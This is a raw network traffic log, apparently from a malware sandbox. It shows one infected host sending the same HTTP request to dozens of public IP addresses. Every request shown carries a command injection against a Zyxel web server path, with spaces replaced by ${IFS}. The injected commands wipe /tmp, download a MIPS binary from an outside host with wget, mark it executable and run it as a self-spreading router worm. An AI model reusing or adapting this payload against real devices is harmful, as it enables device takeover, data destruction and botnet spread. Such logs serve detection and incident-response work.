                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.810981989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4066192.168.2.2340368120.139.153.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811033964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4067192.168.2.235112460.2.58.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811078072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4068192.168.2.2349796189.187.9.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811114073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4069192.168.2.233787271.17.119.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811165094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4070192.168.2.235737269.98.118.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811208010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4071192.168.2.2353592198.229.24.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811247110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4072192.168.2.234342699.198.193.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811307907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4073192.168.2.234923696.120.216.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811357021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4074192.168.2.2342624141.113.239.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811407089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4075192.168.2.2334486197.159.225.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811455011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4076192.168.2.23337061.107.158.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811522007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4077192.168.2.2345302219.138.169.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811568975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4078192.168.2.234177450.150.168.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811616898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4079192.168.2.2339788170.205.235.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811667919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4080192.168.2.2360720114.188.196.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811733961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4081192.168.2.2345418211.149.251.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811774969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4082192.168.2.234799652.162.194.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811836004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4083192.168.2.2332976190.121.232.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811877966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4084192.168.2.2337948128.192.210.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811922073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4085192.168.2.2345930155.37.246.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.811968088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4086192.168.2.23523025.84.56.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812006950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4087192.168.2.2354076145.18.30.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812058926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4088192.168.2.2348678117.20.142.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812099934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4089192.168.2.235132024.186.180.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812129974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4090192.168.2.2342532213.199.50.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812194109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4091192.168.2.2335136119.31.255.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812248945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4092192.168.2.2343402193.146.248.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812325001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4093192.168.2.2348548141.242.12.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812351942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4094192.168.2.2358556170.177.163.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812402010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4095192.168.2.2343930123.36.98.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812463999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4096192.168.2.23598522.174.172.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812494040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4097192.168.2.2346188217.15.209.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812535048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4098192.168.2.2345202111.223.229.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812571049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4099192.168.2.2360658219.18.170.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812598944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4100192.168.2.2343130101.128.202.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812655926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4101192.168.2.235568096.160.34.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812702894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4102192.168.2.2347812136.120.120.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812768936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4103192.168.2.2338092217.87.164.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812823057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4104192.168.2.233684882.193.49.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812876940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4105192.168.2.235283460.99.32.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812932014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4106192.168.2.2339114113.66.223.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.812969923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4107192.168.2.233547873.179.49.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813008070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4108192.168.2.2351106179.108.107.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813056946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4109192.168.2.2351422113.29.179.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813079119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4110192.168.2.234879694.107.57.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813148022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4111192.168.2.2352292142.236.72.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813178062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4112192.168.2.235170485.58.229.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813215017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4113192.168.2.235335094.137.250.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813281059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4114192.168.2.2356090200.232.165.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813325882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4115192.168.2.2354868142.89.160.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813364983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4116192.168.2.234982287.167.130.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813401937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4117192.168.2.2336924135.166.99.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813451052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4118192.168.2.2341102201.2.128.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813499928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4119192.168.2.235435664.235.92.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813539028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4120192.168.2.2345160104.122.174.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813580036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4121192.168.2.2350928111.224.252.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813628912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4122192.168.2.2345140189.148.102.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813663006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4123192.168.2.2343998179.88.32.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813702106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4124192.168.2.2357392155.192.2.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813762903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4125192.168.2.2360268141.78.4.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813802958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4126192.168.2.234578624.221.121.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813844919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4127192.168.2.2347420116.253.221.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813886881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4128192.168.2.2346210116.250.141.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813935041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4129192.168.2.235006036.83.4.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.813971996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4130192.168.2.2349556116.141.33.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814009905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4131192.168.2.2354810190.81.155.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814054012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4132192.168.2.2337490141.212.29.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.814105034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4133192.168.2.2336196166.48.255.171443
                                        TimestampBytes transferredDirectionData
